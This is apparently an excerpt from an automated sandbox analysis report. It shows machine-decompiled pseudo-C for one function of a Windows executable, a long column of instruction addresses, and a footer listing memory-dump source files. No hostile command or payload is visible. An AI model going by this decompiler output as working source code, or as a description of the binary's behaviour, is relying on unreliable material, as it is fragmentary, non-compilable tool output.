				 *((long long*)(_t1298 + 0x60)) = _t1039;
				if (_t1039 -  *((intOrPtr*)(_t1296 - 0x68)) < 0) goto 0x50b120d6;
				r14b =  *(_t1296 + 0x48);
				 *0x50b80550();
				_t1178 =  *((intOrPtr*)(_t1294 + 0x68));
				if (_t1178 == 0) goto 0x50b12e68;
				_t1043 =  *((intOrPtr*)( *_t1178));
				 *0x50b80550();
				 *((long long*)(_t1294 + 0x68)) = _t1349;
				if ( *((intOrPtr*)(_t1294 + 0x70)) == 0) goto 0x50b12e8a;
				_t655 = E00007FF67FF650B5D8F0(_t1043,  *((intOrPtr*)(_t1294 + 0x70)),  *((intOrPtr*)(_t1294 + 0x70)));
				0x50b69b94();
				 *((long long*)(_t1294 + 0x70)) = _t1349;
				if ( *((intOrPtr*)(_t1296 + 0x28)) == 0) goto 0x50b12ea2;
				0x50b6edd8();
				_t1292 = _t1349;
				 *((long long*)(_t1296 + 0x28)) = _t1349;
				 *((long long*)(_t1296 + 0x30)) = _t1349;
				 *((long long*)(_t1296 + 0x38)) = _t1349;
				if (r13d <= 0) goto 0x50b12ef3;
				E00007FF67FF650B2CC24(_t655, 6, r13d, 0x50ba7ab8);
				_t714 =  <=  ? 0x7ff650ba7aba : 0xd50;
				E00007FF67FF650B54598( <=  ? 0x7ff650ba7aba : 0xd50, 2,  *((intOrPtr*)(_t1294 + 0x70)), _t1294, _t1296,  *((intOrPtr*)(_t1296 + 0x13020)) - _t1037);
				_t1061 = _t1043;
				E00007FF67FF650B54598(0xd4e, 2, _t1043, _t1294, _t1296,  *((intOrPtr*)(_t1296 + 0x13020)) - _t1037);
				E00007FF67FF650B283F0(_t1043, _t1296 + 0x20e0, _t1043,  *((intOrPtr*)(_t1294 + 0x68)));
				if ( *((intOrPtr*)(_t1294 + 0x58)) == 0) goto 0x50b12f04;
				E00007FF67FF650B110C0(0x61,  *((intOrPtr*)(_t1294 + 0x58)));
				if ( *((intOrPtr*)(_t1298 + 0x48)) != r12d) goto 0x50b12f55;
				if ( *((intOrPtr*)(_t1298 + 0x5c)) != r12d) goto 0x50b12f55;
				E00007FF67FF650B54598(0xd54, 2, _t1061, _t1294, _t1296, _t1061);
				_t663 = E00007FF67FF650B283F0(_t1043, _t1296 + 0x20e0, _t1061,  *((intOrPtr*)(_t1294 + 0x68)));
				if ( *0x50ba7ab8 != 6) goto 0x50b12f32;
				if (r13d != 0) goto 0x50b12f43;
				E00007FF67FF650B2CC24(_t663, 0xa, r13d, 0x50ba7ab8);
				E00007FF67FF650B31FB0(_t1296 + 0x20e0);
				goto 0x50b1304a;
				if ( *(_t1298 + 0x43) == r12b) goto 0x50b12f71;
				E00007FF67FF650B1A464(0xd54,  *(_t1298 + 0x43) - r12b, _t1043, _t1061, _t1296 + 0x20e0, _t1296 + 0xb0b0, _t1061,  *((intOrPtr*)(_t1294 + 0x68)));
				goto 0x50b12f78;
				E00007FF67FF650B18198(0, _t1061, _t1296 + 0x20e0);
				E00007FF67FF650B37F90(0, _t775, _t1043, _t1061, 0x50ba7a90, _t1296 + 0x211a, _t1344);
				E00007FF67FF650B111C0(0x96, _t1296 + 0x211a);
				_t1045 =  *((intOrPtr*)(_t1294 + 0x60)) + 0x74fc;
				if ( *_t1045 == r12w) goto 0x50b12fde;
				_t1272 =  !=  ? _t1045 : _t1349;
				if (E00007FF67FF650B5A7B4(_t687, _t776, _t1045, _t1061, _t1296 + 0x211a,  !=  ? _t1045 : _t1349, _t1296 + 0x211a) != 0) goto 0x50b12fde;
				E00007FF67FF650B2C930(2, E00007FF67FF650B5A7B4(_t687, _t776, _t1045, _t1061, _t1296 + 0x211a,  !=  ? _t1045 : _t1349, _t1296 + 0x211a), _t1061, 0x50ba7ab8,  !=  ? _t1045 : _t1349, _t1296 + 0x211a, _t1344);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x7164)) == r12b) goto 0x50b12ffb;
				E00007FF67FF650B13530( *((intOrPtr*)(_t1294 + 0x60)), _t1061, _t1294, _t1298 + 0x70,  *((intOrPtr*)(_t1298 + 0x50)));
				_t1063 =  ==  ? _t1296 + 0x211a : _t1296 + 0xa0a2;
				r8d = 0x800;
				_t673 = E00007FF67FF650B5A390( *((intOrPtr*)(_t1294 + 0x60)) + 0xa54a,  ==  ? _t1296 + 0x211a : _t1296 + 0xa0a2,  *((intOrPtr*)(_t1298 + 0x50)));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x7439)) == r12b) goto 0x50b1306c;
				0x50b16288();
				if (_t673 != 0) goto 0x50b1306c;
				if (_t1292 == 0) goto 0x50b13067;
				if (r14b == 0) goto 0x50b1305e;
				E00007FF67FF650B57B7C(0x40, 2, _t776, _t1292,  ==  ? _t1296 + 0x211a : _t1296 + 0xa0a2, _t1292);
				0x50b6edd8();
				goto 0x50b11c45;
				_t1049 =  *((intOrPtr*)(_t1294 + 0x60));
				if ( *((short*)(_t1049 + 0x952a)) == 0x4d) goto 0x50b13083;
				if ( *((intOrPtr*)(_t1049 + 0x71c6)) == r12b) goto 0x50b1309a;
				r9d = r13d;
				E00007FF67FF650B140E0( ==  ? _t1296 + 0x211a : _t1296 + 0xa0a2, _t1294, _t1298 + 0x70, _t1296 + 0x211a);
				if ( *((intOrPtr*)(_t1296 + 0xa05d)) == r12b) goto 0x50b130be;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x7150)) == r12d) goto 0x50b130be;
				E00007FF67FF650B4BA5C(_t687, 0x40, 0, 2, _t774, _t775, _t776, _t1049,  ==  ? _t1296 + 0x211a : _t1296 + 0xa0a2,  *((intOrPtr*)(_t1294 + 0x60)), _t1296 + 0xa0a2, _t1292, _t1294, _t1296 + 0x211a, _t1344);
				goto 0x50b130de;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x7156)) != r12b) goto 0x50b130de;
				E00007FF67FF650B54598(0xd28, 2,  ==  ? _t1296 + 0x211a : _t1296 + 0xa0a2, _t1294, _t1296, _t1296 + 0x211a);
				E00007FF67FF650B283F0( *((intOrPtr*)(_t1294 + 0x60)), _t1296 + 0xa0a2, _t1296 + 0x211a, _t1344);
				if (_t1292 == 0) goto 0x50b130fb;
				if (r14b == 0) goto 0x50b130f2;
				E00007FF67FF650B57B7C(0xd28, 2, _t776, _t1292, _t1296 + 0xa0a2, _t1292);
				0x50b6edd8();
				goto 0x50b11c45;
				E00007FF67FF650B164E4(0x85);
				E00007FF67FF650B14AF0(0x85,  *((intOrPtr*)(_t1294 + 0x60)), _t1063, _t1294, _t1298 + 0x70, _t1296 + 0x211a, _t1346, _t1347);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t1294 + 0x60)) + 0x71d0)) != 3) goto 0x50b1312f;
				return E00007FF67FF650B69D10(E00007FF67FF650B1668C(E00007FF67FF650B164E4(0x86), _t1063, _t1298 + 0x70, _t1298 + 0x70, _t1294), 0x86,  *(_t1296 + 0x16140) ^ _t1298);
			}















































































                                                                                                            0x7ff650b11c7b
                                                                                                            0x7ff650b11c7b
                                                                                                            0x7ff650b11c7b
                                                                                                            0x7ff650b11c7b
                                                                                                            0x7ff650b11c7b
                                                                                                            0x7ff650b11c86
                                                                                                            0x7ff650b11c90
                                                                                                            0x7ff650b11c99
                                                                                                            0x7ff650b11ca3
                                                                                                            0x7ff650b11cac
                                                                                                            0x7ff650b11cb1
                                                                                                            0x7ff650b11cb6
                                                                                                            0x7ff650b11cbb
                                                                                                            0x7ff650b11cbf
                                                                                                            0x7ff650b11cc6
                                                                                                            0x7ff650b11cd0
                                                                                                            0x7ff650b11cd4
                                                                                                            0x7ff650b11cd9
                                                                                                            0x7ff650b11ce0
                                                                                                            0x7ff650b11cee
                                                                                                            0x7ff650b11cf7
                                                                                                            0x7ff650b11d00
                                                                                                            0x7ff650b11d07
                                                                                                            0x7ff650b11d13
                                                                                                            0x7ff650b11d1d
                                                                                                            0x7ff650b11d2a
                                                                                                            0x7ff650b11d2d
                                                                                                            0x7ff650b11d3d
                                                                                                            0x7ff650b11d3f
                                                                                                            0x7ff650b11d42
                                                                                                            0x7ff650b11d4c
                                                                                                            0x7ff650b11d4e
                                                                                                            0x7ff650b11d51
                                                                                                            0x7ff650b11d55
                                                                                                            0x7ff650b11d65
                                                                                                            0x7ff650b11d72
                                                                                                            0x7ff650b11d80
                                                                                                            0x7ff650b11d86
                                                                                                            0x7ff650b11d88
                                                                                                            0x7ff650b11d8c
                                                                                                            0x7ff650b11d97
                                                                                                            0x7ff650b11d9d
                                                                                                            0x7ff650b11d9f
                                                                                                            0x7ff650b11dae
                                                                                                            0x7ff650b11db0
                                                                                                            0x7ff650b11dba
                                                                                                            0x7ff650b11dbc
                                                                                                            0x7ff650b11dca
                                                                                                            0x7ff650b11dd3
                                                                                                            0x7ff650b11ddd
                                                                                                            0x7ff650b11de7
                                                                                                            0x7ff650b11def
                                                                                                            0x7ff650b11df4
                                                                                                            0x7ff650b11dff
                                                                                                            0x7ff650b11e08
                                                                                                            0x7ff650b11e0f
                                                                                                            0x7ff650b11e1c
                                                                                                            0x7ff650b11e26
                                                                                                            0x7ff650b11e2b
                                                                                                            0x7ff650b11e39
                                                                                                            0x7ff650b11e43
                                                                                                            0x7ff650b11e4c
                                                                                                            0x7ff650b11e56
                                                                                                            0x7ff650b11e5f
                                                                                                            0x7ff650b11e69
                                                                                                            0x7ff650b11e73
                                                                                                            0x7ff650b11e7d
                                                                                                            0x7ff650b11e86
                                                                                                            0x7ff650b11e90
                                                                                                            0x7ff650b11e99
                                                                                                            0x7ff650b11ea7
                                                                                                            0x7ff650b11ea9
                                                                                                            0x7ff650b11eb0
                                                                                                            0x7ff650b11eb7
                                                                                                            0x7ff650b11eba
                                                                                                            0x7ff650b11ec3
                                                                                                            0x7ff650b11ecc
                                                                                                            0x7ff650b11ed3
                                                                                                            0x7ff650b11ed8
                                                                                                            0x7ff650b11ee0
                                                                                                            0x7ff650b11eec
                                                                                                            0x7ff650b11ef1
                                                                                                            0x7ff650b11ef3
                                                                                                            0x7ff650b11efe
                                                                                                            0x7ff650b11f05
                                                                                                            0x7ff650b11f0a
                                                                                                            0x7ff650b11f12
                                                                                                            0x7ff650b11f1e
                                                                                                            0x7ff650b11f23
                                                                                                            0x7ff650b11f28
                                                                                                            0x7ff650b11f2d
                                                                                                            0x7ff650b11f35
                                                                                                            0x7ff650b11f3e
                                                                                                            0x7ff650b11f43
                                                                                                            0x7ff650b11f4e
                                                                                                            0x7ff650b11f56
                                                                                                            0x7ff650b11f5b
                                                                                                            0x7ff650b11f63
                                                                                                            0x7ff650b11f65
                                                                                                            0x7ff650b11f6f
                                                                                                            0x7ff650b11f74
                                                                                                            0x7ff650b11f79
                                                                                                            0x7ff650b11f95
                                                                                                            0x7ff650b11fa9
                                                                                                            0x7ff650b11fb9
                                                                                                            0x7ff650b11fbb
                                                                                                            0x7ff650b11fbf
                                                                                                            0x7ff650b11fc9
                                                                                                            0x7ff650b11fd2
                                                                                                            0x7ff650b11ff1
                                                                                                            0x7ff650b11ffe
                                                                                                            0x7ff650b12008
                                                                                                            0x7ff650b12012
                                                                                                            0x7ff650b12026
                                                                                                            0x7ff650b1203d
                                                                                                            0x7ff650b12041
                                                                                                            0x7ff650b12046
                                                                                                            0x7ff650b12049
                                                                                                            0x7ff650b1204e
                                                                                                            0x7ff650b1205a
                                                                                                            0x7ff650b1206c
                                                                                                            0x7ff650b1206f
                                                                                                            0x7ff650b12071
                                                                                                            0x7ff650b1207a
                                                                                                            0x7ff650b12081
                                                                                                            0x7ff650b12083
                                                                                                            0x7ff650b1208f
                                                                                                            0x7ff650b12097
                                                                                                            0x7ff650b120a1
                                                                                                            0x7ff650b120a9
                                                                                                            0x7ff650b120ad
                                                                                                            0x7ff650b120b1
                                                                                                            0x7ff650b120b5
                                                                                                            0x7ff650b120b9
                                                                                                            0x7ff650b120bc
                                                                                                            0x7ff650b120c0
                                                                                                            0x7ff650b120c7
                                                                                                            0x7ff650b120d0
                                                                                                            0x7ff650b120de
                                                                                                            0x7ff650b120e3
                                                                                                            0x7ff650b120e6
                                                                                                            0x7ff650b120ea
                                                                                                            0x7ff650b120ee
                                                                                                            0x7ff650b120f2
                                                                                                            0x7ff650b120f6
                                                                                                            0x7ff650b120fa
                                                                                                            0x7ff650b120fe
                                                                                                            0x7ff650b12102
                                                                                                            0x7ff650b12106
                                                                                                            0x7ff650b1210a
                                                                                                            0x7ff650b1210e
                                                                                                            0x7ff650b12112
                                                                                                            0x7ff650b12117
                                                                                                            0x7ff650b1211c
                                                                                                            0x7ff650b12123
                                                                                                            0x7ff650b12129
                                                                                                            0x7ff650b1212d
                                                                                                            0x7ff650b12138
                                                                                                            0x7ff650b12142
                                                                                                            0x7ff650b1214c
                                                                                                            0x7ff650b1215b
                                                                                                            0x7ff650b12160
                                                                                                            0x7ff650b12167
                                                                                                            0x7ff650b1216e
                                                                                                            0x7ff650b12179
                                                                                                            0x7ff650b1217f
                                                                                                            0x7ff650b12189
                                                                                                            0x7ff650b12190
                                                                                                            0x7ff650b12199
                                                                                                            0x7ff650b121a0
                                                                                                            0x7ff650b121aa
                                                                                                            0x7ff650b121b6
                                                                                                            0x7ff650b121c7
                                                                                                            0x7ff650b121c9
                                                                                                            0x7ff650b121d0
                                                                                                            0x7ff650b121d3
                                                                                                            0x7ff650b121d8
                                                                                                            0x7ff650b121dd
                                                                                                            0x7ff650b121ea
                                                                                                            0x7ff650b121ec
                                                                                                            0x7ff650b121ef
                                                                                                            0x7ff650b121f1
                                                                                                            0x7ff650b121f6
                                                                                                            0x7ff650b12202
                                                                                                            0x7ff650b12208
                                                                                                            0x7ff650b12214
                                                                                                            0x7ff650b12216
                                                                                                            0x7ff650b1222c
                                                                                                            0x7ff650b12235
                                                                                                            0x7ff650b12237
                                                                                                            0x7ff650b1223e
                                                                                                            0x7ff650b12240
                                                                                                            0x7ff650b12248
                                                                                                            0x7ff650b12259
                                                                                                            0x7ff650b12262
                                                                                                            0x7ff650b1226c
                                                                                                            0x7ff650b1226f
                                                                                                            0x7ff650b1227a
                                                                                                            0x7ff650b12284
                                                                                                            0x7ff650b1228d
                                                                                                            0x7ff650b1229c
                                                                                                            0x7ff650b122a5
                                                                                                            0x7ff650b122af
                                                                                                            0x7ff650b122b8
                                                                                                            0x7ff650b122ca
                                                                                                            0x7ff650b122cd
                                                                                                            0x7ff650b122e2
                                                                                                            0x7ff650b122e7
                                                                                                            0x7ff650b122ec
                                                                                                            0x7ff650b122f9
                                                                                                            0x7ff650b122fe
                                                                                                            0x7ff650b12302
                                                                                                            0x7ff650b12313
                                                                                                            0x7ff650b12318
                                                                                                            0x7ff650b1231c
                                                                                                            0x7ff650b12321
                                                                                                            0x7ff650b12324
                                                                                                            0x7ff650b1232d
                                                                                                            0x7ff650b12338
                                                                                                            0x7ff650b1233e
                                                                                                            0x7ff650b12342
                                                                                                            0x7ff650b12346
                                                                                                            0x7ff650b1234e
                                                                                                            0x7ff650b12353
                                                                                                            0x7ff650b1235b
                                                                                                            0x7ff650b1235d
                                                                                                            0x7ff650b12364
                                                                                                            0x7ff650b12372
                                                                                                            0x7ff650b1237b
                                                                                                            0x7ff650b12381
                                                                                                            0x7ff650b12386
                                                                                                            0x7ff650b12391
                                                                                                            0x7ff650b123a2
                                                                                                            0x7ff650b123ab
                                                                                                            0x7ff650b123ad
                                                                                                            0x7ff650b123b2
                                                                                                            0x7ff650b123cc
                                                                                                            0x7ff650b123ce
                                                                                                            0x7ff650b123e1
                                                                                                            0x7ff650b123e9
                                                                                                            0x7ff650b123f6
                                                                                                            0x7ff650b123fa
                                                                                                            0x7ff650b123ff
                                                                                                            0x7ff650b12402
                                                                                                            0x7ff650b12409
                                                                                                            0x7ff650b1240c
                                                                                                            0x7ff650b12416
                                                                                                            0x7ff650b12420
                                                                                                            0x7ff650b12427
                                                                                                            0x7ff650b1243a
                                                                                                            0x7ff650b12448
                                                                                                            0x7ff650b1244a
                                                                                                            0x7ff650b1245c
                                                                                                            0x7ff650b12464
                                                                                                            0x7ff650b12475
                                                                                                            0x7ff650b1247a
                                                                                                            0x7ff650b1248e
                                                                                                            0x7ff650b12493
                                                                                                            0x7ff650b124a8
                                                                                                            0x7ff650b124b2
                                                                                                            0x7ff650b124bb
                                                                                                            0x7ff650b124ca
                                                                                                            0x7ff650b124d2
                                                                                                            0x7ff650b124dc
                                                                                                            0x7ff650b124e1
                                                                                                            0x7ff650b124f7
                                                                                                            0x7ff650b124fc
                                                                                                            0x7ff650b12507
                                                                                                            0x7ff650b1250e
                                                                                                            0x7ff650b1251c
                                                                                                            0x7ff650b12522
                                                                                                            0x7ff650b12528
                                                                                                            0x7ff650b12531
                                                                                                            0x7ff650b12533
                                                                                                            0x7ff650b12539
                                                                                                            0x7ff650b1253e
                                                                                                            0x7ff650b1254a
                                                                                                            0x7ff650b12550
                                                                                                            0x7ff650b12554
                                                                                                            0x7ff650b12558
                                                                                                            0x7ff650b12563
                                                                                                            0x7ff650b1256d
                                                                                                            0x7ff650b12575
                                                                                                            0x7ff650b12577
                                                                                                            0x7ff650b1257c
                                                                                                            0x7ff650b12584
                                                                                                            0x7ff650b1258d
                                                                                                            0x7ff650b12592
                                                                                                            0x7ff650b12598
                                                                                                            0x7ff650b125a4
                                                                                                            0x7ff650b125a9
                                                                                                            0x7ff650b125b4
                                                                                                            0x7ff650b125b8
                                                                                                            0x7ff650b125b8
                                                                                                            0x7ff650b125c6
                                                                                                            0x7ff650b125cd
                                                                                                            0x7ff650b125d1
                                                                                                            0x7ff650b125dc
                                                                                                            0x7ff650b125e3
                                                                                                            0x7ff650b125e7
                                                                                                            0x7ff650b125e9
                                                                                                            0x7ff650b125fd
                                                                                                            0x7ff650b12604
                                                                                                            0x7ff650b1260c
                                                                                                            0x7ff650b12610
                                                                                                            0x7ff650b12616
                                                                                                            0x7ff650b12620
                                                                                                            0x7ff650b12625
                                                                                                            0x7ff650b1262b
                                                                                                            0x7ff650b12638
                                                                                                            0x7ff650b1263e
                                                                                                            0x7ff650b12645
                                                                                                            0x7ff650b12649
                                                                                                            0x7ff650b1264f
                                                                                                            0x7ff650b12653
                                                                                                            0x7ff650b1265d
                                                                                                            0x7ff650b12671
                                                                                                            0x7ff650b1267e
                                                                                                            0x7ff650b12688
                                                                                                            0x7ff650b1268c
                                                                                                            0x7ff650b12691
                                                                                                            0x7ff650b12697
                                                                                                            0x7ff650b12697
                                                                                                            0x7ff650b1269e
                                                                                                            0x7ff650b126ae
                                                                                                            0x7ff650b126b7
                                                                                                            0x7ff650b126c0
                                                                                                            0x7ff650b126cc
                                                                                                            0x7ff650b126d3
                                                                                                            0x7ff650b126da
                                                                                                            0x7ff650b126e1
                                                                                                            0x7ff650b126eb
                                                                                                            0x7ff650b126f2
                                                                                                            0x7ff650b12700
                                                                                                            0x7ff650b12708
                                                                                                            0x7ff650b12718
                                                                                                            0x7ff650b1271d
                                                                                                            0x7ff650b12724
                                                                                                            0x7ff650b12727
                                                                                                            0x7ff650b12732
                                                                                                            0x7ff650b12737
                                                                                                            0x7ff650b12742
                                                                                                            0x7ff650b1274e
                                                                                                            0x7ff650b12753
                                                                                                            0x7ff650b1275d
                                                                                                            0x7ff650b12761
                                                                                                            0x7ff650b1276e
                                                                                                            0x7ff650b1277f
                                                                                                            0x7ff650b12786
                                                                                                            0x7ff650b1278c
                                                                                                            0x7ff650b12792
                                                                                                            0x7ff650b12799
                                                                                                            0x7ff650b127a1
                                                                                                            0x7ff650b127ae
                                                                                                            0x7ff650b127ae
                                                                                                            0x7ff650b127b5
                                                                                                            0x7ff650b127b9
                                                                                                            0x7ff650b127c3
                                                                                                            0x7ff650b127ca
                                                                                                            0x7ff650b127df
                                                                                                            0x7ff650b127e5
                                                                                                            0x7ff650b127e9
                                                                                                            0x7ff650b127f2
                                                                                                            0x7ff650b127fb
                                                                                                            0x7ff650b12809
                                                                                                            0x7ff650b12810
                                                                                                            0x7ff650b12817
                                                                                                            0x7ff650b1281e
                                                                                                            0x7ff650b12821
                                                                                                            0x7ff650b1282a
                                                                                                            0x7ff650b1282f
                                                                                                            0x7ff650b12832
                                                                                                            0x7ff650b12839
                                                                                                            0x7ff650b12840
                                                                                                            0x7ff650b12844
                                                                                                            0x7ff650b1284a
                                                                                                            0x7ff650b1284d
                                                                                                            0x7ff650b12856
                                                                                                            0x7ff650b1285f
                                                                                                            0x7ff650b12861
                                                                                                            0x7ff650b12865
                                                                                                            0x7ff650b1286b
                                                                                                            0x7ff650b12878
                                                                                                            0x7ff650b1288a
                                                                                                            0x7ff650b1288f
                                                                                                            0x7ff650b12891
                                                                                                            0x7ff650b12897
                                                                                                            0x7ff650b1289e
                                                                                                            0x7ff650b128a0
                                                                                                            0x7ff650b128a6
                                                                                                            0x7ff650b128ad
                                                                                                            0x7ff650b128b6
                                                                                                            0x7ff650b128bb
                                                                                                            0x7ff650b128c2
                                                                                                            0x7ff650b128d7
                                                                                                            0x7ff650b128dc
                                                                                                            0x7ff650b128e3
                                                                                                            0x7ff650b128f4
                                                                                                            0x7ff650b128fe
                                                                                                            0x7ff650b12910
                                                                                                            0x7ff650b12928
                                                                                                            0x7ff650b12932
                                                                                                            0x7ff650b12938
                                                                                                            0x7ff650b1294e
                                                                                                            0x7ff650b12953
                                                                                                            0x7ff650b12957
                                                                                                            0x7ff650b1295e
                                                                                                            0x7ff650b12968
                                                                                                            0x7ff650b1296d
                                                                                                            0x7ff650b12971
                                                                                                            0x7ff650b12976
                                                                                                            0x7ff650b12979
                                                                                                            0x7ff650b12982
                                                                                                            0x7ff650b12984
                                                                                                            0x7ff650b1298a
                                                                                                            0x7ff650b1298e
                                                                                                            0x7ff650b12996
                                                                                                            0x7ff650b1299b
                                                                                                            0x7ff650b129a4
                                                                                                            0x7ff650b129a9
                                                                                                            0x7ff650b129ae
                                                                                                            0x7ff650b129b7
                                                                                                            0x7ff650b129bc
                                                                                                            0x7ff650b129c6
                                                                                                            0x7ff650b129d4
                                                                                                            0x7ff650b129db
                                                                                                            0x7ff650b129dd
                                                                                                            0x7ff650b129e2
                                                                                                            0x7ff650b129e9
                                                                                                            0x7ff650b129f1
                                                                                                            0x7ff650b129f6
                                                                                                            0x7ff650b129fd
                                                                                                            0x7ff650b12a00
                                                                                                            0x7ff650b12a0a
                                                                                                            0x7ff650b12a0e
                                                                                                            0x7ff650b12a15
                                                                                                            0x7ff650b12a21
                                                                                                            0x7ff650b12a23
                                                                                                            0x7ff650b12a34
                                                                                                            0x7ff650b12a50
                                                                                                            0x7ff650b12a57
                                                                                                            0x7ff650b12a5b
                                                                                                            0x7ff650b12a66
                                                                                                            0x7ff650b12a76
                                                                                                            0x7ff650b12a78
                                                                                                            0x7ff650b12a7e
                                                                                                            0x7ff650b12a82
                                                                                                            0x7ff650b12a84
                                                                                                            0x7ff650b12a96
                                                                                                            0x7ff650b12aaa
                                                                                                            0x7ff650b12aad
                                                                                                            0x7ff650b12ab5
                                                                                                            0x7ff650b12ac2
                                                                                                            0x7ff650b12ad7
                                                                                                            0x7ff650b12ae4
                                                                                                            0x7ff650b12aea
                                                                                                            0x7ff650b12aef
                                                                                                            0x7ff650b12b00
                                                                                                            0x7ff650b12b00
                                                                                                            0x7ff650b12b07
                                                                                                            0x7ff650b12b0f
                                                                                                            0x7ff650b12b13
                                                                                                            0x7ff650b12b1e
                                                                                                            0x7ff650b12b26
                                                                                                            0x7ff650b12b38
                                                                                                            0x7ff650b12b3d
                                                                                                            0x7ff650b12b47
                                                                                                            0x7ff650b12b54
                                                                                                            0x7ff650b12b5a
                                                                                                            0x7ff650b12b6a
                                                                                                            0x7ff650b12b71
                                                                                                            0x7ff650b12b92
                                                                                                            0x7ff650b12b9d
                                                                                                            0x7ff650b12ba2
                                                                                                            0x7ff650b12ba6
                                                                                                            0x7ff650b12bab
                                                                                                            0x7ff650b12bbd
                                                                                                            0x7ff650b12bc4
                                                                                                            0x7ff650b12bd4
                                                                                                            0x7ff650b12bda
                                                                                                            0x7ff650b12be4
                                                                                                            0x7ff650b12bea
                                                                                                            0x7ff650b12bf1
                                                                                                            0x7ff650b12bfd
                                                                                                            0x7ff650b12c04
                                                                                                            0x7ff650b12c06
                                                                                                            0x7ff650b12c1d
                                                                                                            0x7ff650b12c22
                                                                                                            0x7ff650b12c26
                                                                                                            0x7ff650b12c2f
                                                                                                            0x7ff650b12c34
                                                                                                            0x7ff650b12c49
                                                                                                            0x7ff650b12c4e
                                                                                                            0x7ff650b12c5e
                                                                                                            0x7ff650b12c64
                                                                                                            0x7ff650b12c72
                                                                                                            0x7ff650b12c7e
                                                                                                            0x7ff650b12c91
                                                                                                            0x7ff650b12c98
                                                                                                            0x7ff650b12c9a
                                                                                                            0x7ff650b12ca7
                                                                                                            0x7ff650b12cb3
                                                                                                            0x7ff650b12cb8
                                                                                                            0x7ff650b12cbd
                                                                                                            0x7ff650b12cca
                                                                                                            0x7ff650b12cce
                                                                                                            0x7ff650b12cd6
                                                                                                            0x7ff650b12cea
                                                                                                            0x7ff650b12cee
                                                                                                            0x7ff650b12cf5
                                                                                                            0x7ff650b12cf8
                                                                                                            0x7ff650b12cfd
                                                                                                            0x7ff650b12d00
                                                                                                            0x7ff650b12d03
                                                                                                            0x7ff650b12d0f
                                                                                                            0x7ff650b12d22
                                                                                                            0x7ff650b12d27
                                                                                                            0x7ff650b12d2c
                                                                                                            0x7ff650b12d34
                                                                                                            0x7ff650b12d3b
                                                                                                            0x7ff650b12d46
                                                                                                            0x7ff650b12d4b
                                                                                                            0x7ff650b12d4f
                                                                                                            0x7ff650b12d5c
                                                                                                            0x7ff650b12d62
                                                                                                            0x7ff650b12d65
                                                                                                            0x7ff650b12d70
                                                                                                            0x7ff650b12d7c
                                                                                                            0x7ff650b12d91
                                                                                                            0x7ff650b12d9f
                                                                                                            0x7ff650b12da1
                                                                                                            0x7ff650b12db2
                                                                                                            0x7ff650b12dc5
                                                                                                            0x7ff650b12dce
                                                                                                            0x7ff650b12dd8
                                                                                                            0x7ff650b12ddc
                                                                                                            0x7ff650b12de1
                                                                                                            0x7ff650b12deb
                                                                                                            0x7ff650b12df7
                                                                                                            0x7ff650b12e14
                                                                                                            0x7ff650b12e23
                                                                                                            0x7ff650b12e26
                                                                                                            0x7ff650b12e2f
                                                                                                            0x7ff650b12e35
                                                                                                            0x7ff650b12e48
                                                                                                            0x7ff650b12e4e
                                                                                                            0x7ff650b12e55
                                                                                                            0x7ff650b12e5f
                                                                                                            0x7ff650b12e62
                                                                                                            0x7ff650b12e68
                                                                                                            0x7ff650b12e73
                                                                                                            0x7ff650b12e78
                                                                                                            0x7ff650b12e85
                                                                                                            0x7ff650b12e8a
                                                                                                            0x7ff650b12e91
                                                                                                            0x7ff650b12e96
                                                                                                            0x7ff650b12e9b
                                                                                                            0x7ff650b12e9e
                                                                                                            0x7ff650b12ea2
                                                                                                            0x7ff650b12ea6
                                                                                                            0x7ff650b12ead
                                                                                                            0x7ff650b12ebb
                                                                                                            0x7ff650b12ed0
                                                                                                            0x7ff650b12ed3
                                                                                                            0x7ff650b12ed8
                                                                                                            0x7ff650b12ee0
                                                                                                            0x7ff650b12eee
                                                                                                            0x7ff650b12ef8
                                                                                                            0x7ff650b12eff
                                                                                                            0x7ff650b12f09
                                                                                                            0x7ff650b12f10
                                                                                                            0x7ff650b12f17
                                                                                                            0x7ff650b12f1f
                                                                                                            0x7ff650b12f2b
                                                                                                            0x7ff650b12f30
                                                                                                            0x7ff650b12f3e
                                                                                                            0x7ff650b12f4a
                                                                                                            0x7ff650b12f50
                                                                                                            0x7ff650b12f61
                                                                                                            0x7ff650b12f6a
                                                                                                            0x7ff650b12f6f
                                                                                                            0x7ff650b12f73
                                                                                                            0x7ff650b12f88
                                                                                                            0x7ff650b12f99
                                                                                                            0x7ff650b12fa2
                                                                                                            0x7ff650b12fac
                                                                                                            0x7ff650b12fb9
                                                                                                            0x7ff650b12fcb
                                                                                                            0x7ff650b12fd9
                                                                                                            0x7ff650b12fe9
                                                                                                            0x7ff650b12ff6
                                                                                                            0x7ff650b13011
                                                                                                            0x7ff650b13020
                                                                                                            0x7ff650b13029
                                                                                                            0x7ff650b13039
                                                                                                            0x7ff650b13041
                                                                                                            0x7ff650b13048
                                                                                                            0x7ff650b1304d
                                                                                                            0x7ff650b13052
                                                                                                            0x7ff650b13059
                                                                                                            0x7ff650b13061
                                                                                                            0x7ff650b13067
                                                                                                            0x7ff650b1306c
                                                                                                            0x7ff650b13078
                                                                                                            0x7ff650b13081
                                                                                                            0x7ff650b13083
                                                                                                            0x7ff650b13095
                                                                                                            0x7ff650b130a1
                                                                                                            0x7ff650b130ae
                                                                                                            0x7ff650b130b7
                                                                                                            0x7ff650b130bc
                                                                                                            0x7ff650b130c9
                                                                                                            0x7ff650b130d0
                                                                                                            0x7ff650b130d8
                                                                                                            0x7ff650b130e1
                                                                                                            0x7ff650b130e6
                                                                                                            0x7ff650b130ed
                                                                                                            0x7ff650b130f5
                                                                                                            0x7ff650b130fb
                                                                                                            0x7ff650b13105
                                                                                                            0x7ff650b13112
                                                                                                            0x7ff650b13122
                                                                                                            0x7ff650b13162

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
